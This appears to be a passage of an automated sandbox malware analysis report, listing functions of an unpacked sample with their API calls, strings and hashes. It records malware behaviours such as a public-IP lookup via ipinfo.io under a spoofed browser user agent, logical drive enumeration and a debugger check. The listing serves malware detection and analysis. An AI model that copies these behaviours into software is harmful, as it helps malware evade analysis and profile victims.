                                                                                                                            • Opcode ID: b494de1adc30a8f79ccb5c9bebb926f5a2ac75c33df699561a76bc043be4c7c8
                                                                                                                            • Instruction ID: d9b6583839900e7c546c71df0e51cb6a95a5132ca019d880cf3c400ebc5e44b3
                                                                                                                            • Opcode Fuzzy Hash: b494de1adc30a8f79ccb5c9bebb926f5a2ac75c33df699561a76bc043be4c7c8
                                                                                                                            • Instruction Fuzzy Hash: FC31E835641218ABD7209B75DC8CFEB7778FF44751F0005AAF90AD7290DBB49A84CAA8
                                                                                                                            Function 0041A560 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 73networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A58A
                                                                                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE,00000004,00000000,00000000,00000000), ref: 0041A59F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://ipinfo.io/ip,00000000,00000000,40000000,00000000), ref: 0041A5B8
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C5
                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000000C8,?), ref: 0041A5EF
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041A61D
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62F
                                                                                                                            Strings
                                                                                                                            • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE, xrefs: 0041A59A
                                                                                                                            • http://ipinfo.io/ip, xrefs: 0041A5B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead_memset_strcpy_s
                                                                                                                            • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE$http://ipinfo.io/ip
                                                                                                                            • API String ID: 3451672010-81575548
                                                                                                                            • Opcode ID: 2b4508ced195ef969f8e06f1aaf0d87ff5010a933150aa018d5f6d6cc2230e21
                                                                                                                            • Instruction ID: 15cbbe58e9625973908351285b623f5b827d69d73ed0f1a4b7c35f1f0d30dc65
                                                                                                                            • Opcode Fuzzy Hash: 2b4508ced195ef969f8e06f1aaf0d87ff5010a933150aa018d5f6d6cc2230e21
                                                                                                                            • Instruction Fuzzy Hash: B121D8B1A402187BD7219B54AD46FEE7B78DB85710F1000EAFB04B71D1DB742E058BAD
                                                                                                                            Function 00413780 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 167threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • ExitThread.KERNEL32 ref: 004139A8
                                                                                                                              • Part of subcall function 0040EB90: _aullshr.NTDLL ref: 0040EC0D
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004137D7
                                                                                                                            • _memset.LIBCMT ref: 004137F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountDriveExitLogicalSleepStringsThreadTick_aullshr_memset_rand
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            • API String ID: 221334729-1009255891
                                                                                                                            • Opcode ID: ee36ca6774ebe2f29d32160952d8b75957303effb2923605b8357d819f64d9a0
                                                                                                                            • Instruction ID: 68f498cd6aaf7dc1cd63195ba9e4301ef2104bc8583fa51ee68a2c2ad5c38cb0
                                                                                                                            • Opcode Fuzzy Hash: ee36ca6774ebe2f29d32160952d8b75957303effb2923605b8357d819f64d9a0
                                                                                                                            • Instruction Fuzzy Hash: AE5103B25102019BD720EF28DC81AE773E4FB98701F844A2BF055E7264E3B49AC4C79A
                                                                                                                            Function 0041AE10 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 310COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ....................$P6C$P6C$gfff
                                                                                                                            • API String ID: 0-2552349421
                                                                                                                            • Opcode ID: 654f7f6d0a273ed443a8fe6949f9b33b8946a87f0c26849525c27ac89645afe9
                                                                                                                            • Instruction ID: 1a57dfd0861042f04d653370a4c601d03e899c9ff72e49831f653edbe7fd71a6
                                                                                                                            • Opcode Fuzzy Hash: 654f7f6d0a273ed443a8fe6949f9b33b8946a87f0c26849525c27ac89645afe9
                                                                                                                            • Instruction Fuzzy Hash: 9BC1C1756083419BC314DF25D8C1AABBBE5FFC9344F008A2EF89987241D775E889CB96
                                                                                                                            Function 00411120 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 337COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aullshr
                                                                                                                            • String ID: 0>C$@:C$@:C
                                                                                                                            • API String ID: 4154462305-3304788932
                                                                                                                            • Opcode ID: b6c0a46786a147524c927ca7db6b3ab612617ea02a39d560c74911e8f3d54003
                                                                                                                            • Instruction ID: 6f33c4bb07da5afcf50d228bf944658890b72a782cf23c8074268a3509e2577d
                                                                                                                            • Opcode Fuzzy Hash: b6c0a46786a147524c927ca7db6b3ab612617ea02a39d560c74911e8f3d54003
                                                                                                                            • Instruction Fuzzy Hash: B9C17BB1A087009FD324DF2AD841A6BB7E5BFC9714F508A2EF699C7350E774D8418B86
                                                                                                                            Function 0041AEF9 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: ....................$P6C$P6C
                                                                                                                            • API String ID: 2102423945-367312072
                                                                                                                            • Opcode ID: 91f7fd61f2b6367b2e8f1bd63c645b3c068b803abe8b87d30c7e6aed127f295a
                                                                                                                            • Instruction ID: c50ebbbe94665e3b61506474d11c71efd2640967613476eb690509a89d1b308a
                                                                                                                            • Opcode Fuzzy Hash: 91f7fd61f2b6367b2e8f1bd63c645b3c068b803abe8b87d30c7e6aed127f295a
                                                                                                                            • Instruction Fuzzy Hash: 31919F756083419BC714DF25D8C1A9BBBE5FFC8344F008A2EF99987201D775E84ACB96
                                                                                                                            Function 00423EBB Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004255F2
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00425607
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00431404), ref: 00425612
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042562E
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00425635
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction ID: 6bb5de789a321063787ca96de7b9cd1f4631822c0065670583fbb202f00acfec
                                                                                                                            • Opcode Fuzzy Hash: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction Fuzzy Hash: D021BCB4901348AFD700DF29F98AB443BB0FB18315F50713AEA0987672E7B459858F8E
                                                                                                                            Function 0041AAB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: P6C$gfff
                                                                                                                            • API String ID: 2102423945-1005010341
                                                                                                                            • Opcode ID: 2137c3bde973da1a7547dbdfd5203f66012a0d9a3b0adf8fcfe7f9488a6b87bc
                                                                                                                            • Instruction ID: 6c3f72de7210157f29cf342e4d814f1a2669bf009d892c6013dbe885ee46713a
                                                                                                                            • Opcode Fuzzy Hash: 2137c3bde973da1a7547dbdfd5203f66012a0d9a3b0adf8fcfe7f9488a6b87bc
                                                                                                                            • Instruction Fuzzy Hash: 1491D371A097418BC704CF69DC80AABBBE9AFC4310F044A2EF985D7251E778D954CB9B
                                                                                                                            Function 0041F1B0 Relevance: 4.8, APIs: 3, Instructions: 274COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 97b847d3d6f935b2559269f9b31054a1aeae503f4ce6babc75f64bca1739966b
                                                                                                                            • Instruction ID: de431158a44b3133534017a87b3374f1ebaac58181563200fe939117984d630c
                                                                                                                            • Opcode Fuzzy Hash: 97b847d3d6f935b2559269f9b31054a1aeae503f4ce6babc75f64bca1739966b
                                                                                                                            • Instruction Fuzzy Hash: 61A182153097C28BC335CA3D489519ABFE25FF6100748CA9DE8D787B87D524E9A8C7E2
                                                                                                                            Function 00420580 Relevance: 4.6, APIs: 3, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 46a33e0e9512678b613f934be39408df8913caf37c51d019c81f1caad24d6c8e
                                                                                                                            • Instruction ID: cbc7c615108e09d339b68db207b3f0fd6d216c7b21e59e48f69948ad84cb62b7
                                                                                                                            • Opcode Fuzzy Hash: 46a33e0e9512678b613f934be39408df8913caf37c51d019c81f1caad24d6c8e
                                                                                                                            • Instruction Fuzzy Hash: AE4102513093C19BC725CE3D48D169BBFD15FA2100F88C98DE8D68BB87C068E968C7B1
                                                                                                                            Function 0041BA80 Relevance: 4.6, APIs: 3, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: bdd2566ff5411e6a4d49cb4e498a7bc632867271d99e16107ed95692fd197c3c
                                                                                                                            • Instruction ID: 0c2844e49b953b65b934c48b27b412c8fdb23d70e2a8bec69a6c319d4817b5ec
                                                                                                                            • Opcode Fuzzy Hash: bdd2566ff5411e6a4d49cb4e498a7bc632867271d99e16107ed95692fd197c3c
                                                                                                                            • Instruction Fuzzy Hash: E341A2502097C09EC725CE3D48D169ABFE59F66100F48C9CEE8D58BF87C168E659C3B1
                                                                                                                            Function 00419090 Relevance: 4.0, APIs: 2, Instructions: 1049COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dd56a67d942ccbab2fd46126f377fd34714b8785daef123adf2bc6544120346b
                                                                                                                            • Instruction ID: c3b376da474397fd8bfabbf4f8d3275dc8984ae6232424f8755c8efce04c7dc3
                                                                                                                            • Opcode Fuzzy Hash: dd56a67d942ccbab2fd46126f377fd34714b8785daef123adf2bc6544120346b
                                                                                                                            • Instruction Fuzzy Hash: 5282AC70A043519FDB20CF14C9A0AAFB7E1BF88744F14492EE8859B340D779ED85CB9A
                                                                                                                            Function 004032F0 Relevance: 3.1, Strings: 2, Instructions: 585COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: eA$eA
                                                                                                                            • API String ID: 0-1222041842
                                                                                                                            • Opcode ID: 81472c0f3449ab93b2418846ab4449d567b0c7ba93f645c2b3c65b12225d26aa
                                                                                                                            • Instruction ID: 1753c426f78cacfaa2a21b56c80e19fbcdf98715fe0f81e244ef27ef099ab1ce
                                                                                                                            • Opcode Fuzzy Hash: 81472c0f3449ab93b2418846ab4449d567b0c7ba93f645c2b3c65b12225d26aa
                                                                                                                            • Instruction Fuzzy Hash: 6F32CCB5E002189FDB18CFA9C981AAEBBBAFF88305F14856EE409A7345D7345E41CF54
                                                                                                                            Function 00411510 Relevance: 3.0, Strings: 2, Instructions: 464COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: X;C$=C
                                                                                                                            • API String ID: 0-3117722426
                                                                                                                            • Opcode ID: ab7ef5ead1ba021fc240500758cb51aa279bd5731aea722592ba2cbf6cdf8b28
                                                                                                                            • Instruction ID: 34d170cc2da6165733478edb2919f9704db3175d85021668ed0ed7e858c8bade
                                                                                                                            • Opcode Fuzzy Hash: ab7ef5ead1ba021fc240500758cb51aa279bd5731aea722592ba2cbf6cdf8b28
                                                                                                                            • Instruction Fuzzy Hash: 6E0208B1A093409FD364CF29C881B9BB7E5BFC9304F50892EE68DC7351EB7498458B96
                                                                                                                            Function 00412300 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0=C$<C
                                                                                                                            • API String ID: 0-2166075456
                                                                                                                            • Opcode ID: 0e9e7faa1734838cdf3fcfd964466f3c1a14958dc91313a531cf17f56b592d4a
                                                                                                                            • Instruction ID: 3de3db98af5ee8465bf640654e8c60e704a675f0a343123add97231fc5765409
                                                                                                                            • Opcode Fuzzy Hash: 0e9e7faa1734838cdf3fcfd964466f3c1a14958dc91313a531cf17f56b592d4a
                                                                                                                            • Instruction Fuzzy Hash: 38A1C972A047049FD314CF6AD48165BF7E2BBC8714F148A3EF959C7381E6B8E8518B86
                                                                                                                            Function 0041F490 Relevance: 2.7, Strings: 1, Instructions: 1474COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \5C
                                                                                                                            • API String ID: 0-3607354458
                                                                                                                            • Opcode ID: c33e68c9777635af4b251fa118966882a2f2a63359a1434f468b53c0dbb94a12
                                                                                                                            • Instruction ID: 483e694452bb27de87d965050172cf41edfbae38b48850e5c2b478c31bb2b7e0
                                                                                                                            • Opcode Fuzzy Hash: c33e68c9777635af4b251fa118966882a2f2a63359a1434f468b53c0dbb94a12
                                                                                                                            • Instruction Fuzzy Hash: 5FC2EE77E007288BDB54CF9A988019DFBB7AFC8214F5E815AD858B7316C6B468468FC4
                                                                                                                            Function 003B0C47 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: bea9da46df65b63dd4d1821f5554e3179004f9199237be16b42902a5eff0747b
                                                                                                                            • Instruction ID: 93d1bc2c461382f9cc08b757c126f814a127e1c93f804cdbd031c1392e47c67d
                                                                                                                            • Opcode Fuzzy Hash: bea9da46df65b63dd4d1821f5554e3179004f9199237be16b42902a5eff0747b
                                                                                                                            • Instruction Fuzzy Hash: 98510636E041288FDB0DCEA5CCD1BEEB7B2FB81314F15922AC546AF680DB745842CB80
                                                                                                                            Function 003B0C6D Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: 23ca4a7d681df7e6057d8c1d85ffec7e1d5bd562aedea103cfc6c33edcf18fe2
                                                                                                                            • Instruction ID: 2db60a88def87a7542893f26fcf6580ee5a53b17307236b424a6cdd567dfc782
                                                                                                                            • Opcode Fuzzy Hash: 23ca4a7d681df7e6057d8c1d85ffec7e1d5bd562aedea103cfc6c33edcf18fe2
                                                                                                                            • Instruction Fuzzy Hash: 9341A532E052288FDB09CFA5CCD1BEDB7B2FB81318F155229D546AFA90D7745942CB80
                                                                                                                            Function 003B0C8C Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: d1dd456d30c4c9e063a1937159eaa9418de9403de5e286d1490124b71d34f05f
                                                                                                                            • Instruction ID: bce4fcb2c84f3397e59cbe5a0850cb3abd55c962395c7fc960b1389c7856aabc
